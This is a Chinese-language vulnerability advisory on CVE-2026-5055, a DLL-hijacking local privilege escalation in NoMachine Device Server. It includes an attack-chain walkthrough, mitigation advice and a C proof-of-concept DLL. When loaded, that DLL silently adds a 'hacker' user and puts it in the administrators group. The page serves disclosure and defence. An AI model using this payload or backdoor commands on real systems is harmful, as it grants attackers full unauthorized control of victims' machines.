CVE-2026-5055 CVSS 7.8 高危

CVE-2026-5055 NoMachine本地提权漏洞

披露日期: 2026-04-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5055

漏洞类型

本地提权

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

NoMachine

漏洞概述

CVE-2026-5055 指的是 NoMachine Device Server 中存在的一个非受控搜索路径元素漏洞，可导致本地权限提升。该漏洞的核心问题在于产品加载库文件时未验证路径安全性。攻击者若已具备目标系统的低权限代码执行能力，便可利用此缺陷，通过植入恶意库文件，触发服务加载，从而在 SYSTEM 上下文中执行任意代码，完全控制受影响的系统。

技术细节

该漏洞的根源在于 NoMachine Device Server 在加载动态链接库（DLL）时，使用了不安全的搜索路径机制。系统在查找库文件时，可能会优先检查当前工作目录或用户可写的目录，而非仅限于安全的系统目录。攻击者首先需要在系统上获得低级别的访问权限，然后识别出服务加载的特定 DLL 名称。接着，攻击者会在服务预期的搜索路径中放置一个同名的恶意 DLL。当 NoMachine 服务启动或特定操作触发库加载时，由于路径验证缺失，恶意 DLL 将被加载并执行。由于服务通常以高权限的 SYSTEM 账户运行，这直接导致攻击者获得最高系统权限，实现从低权限用户到 SYSTEM 的垂直提权。这种攻击方式通常被称为 DLL 劫持或路径拦截。

攻击链分析

STEP 1

初始访问

攻击者需要在目标系统上获得低权限用户的访问权限，能够执行代码或写入文件。

STEP 2

侦察与分析

攻击者分析 NoMachine Device Server 的行为，确定其加载的 DLL 名称以及不安全的搜索路径位置。

STEP 3

恶意文件植入

攻击者在识别出的不安全路径下创建一个恶意的 DLL 文件，替换或覆盖预期的库文件。

STEP 4

触发漏洞

等待或主动触发 NoMachine 服务重启或相关操作，导致服务加载攻击者植入的恶意 DLL。

STEP 5

权限提升

恶意 DLL 在 SYSTEM 上下文中执行，攻击者获得最高权限，完全控制系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdlib.h>

// PoC for CVE-2026-5055: Malicious DLL (DLL Hijacking)
// This code demonstrates how a payload could be executed if the DLL is loaded by a privileged service.

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Execute arbitrary code with SYSTEM privileges
        // Example: Add a new user to the administrators group
        WinExec("net user hacker P@ssw0rd /add", SW_HIDE);
        WinExec("net localgroup administrators hacker /add", SW_HIDE);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

影响范围

未在提供信息中明确指定

防御指南

临时缓解措施

建议限制普通用户对 NoMachine 服务相关目录及系统 PATH 中可写目录的访问权限。可以通过文件系统 ACL（访问控制列表）确保只有受信任的管理员才能修改关键库文件。同时，监控系统的异常进程创建和权限提升行为，及时发现潜在的利用尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5055
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5055
3 Details https://www.cvedetails.com/cve/CVE-2026-5055/
4 VulDB https://vuldb.com/cve/CVE-2026-5055
5 Link https://www.zerodayinitiative.com/advisories/ZDI-26-249/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表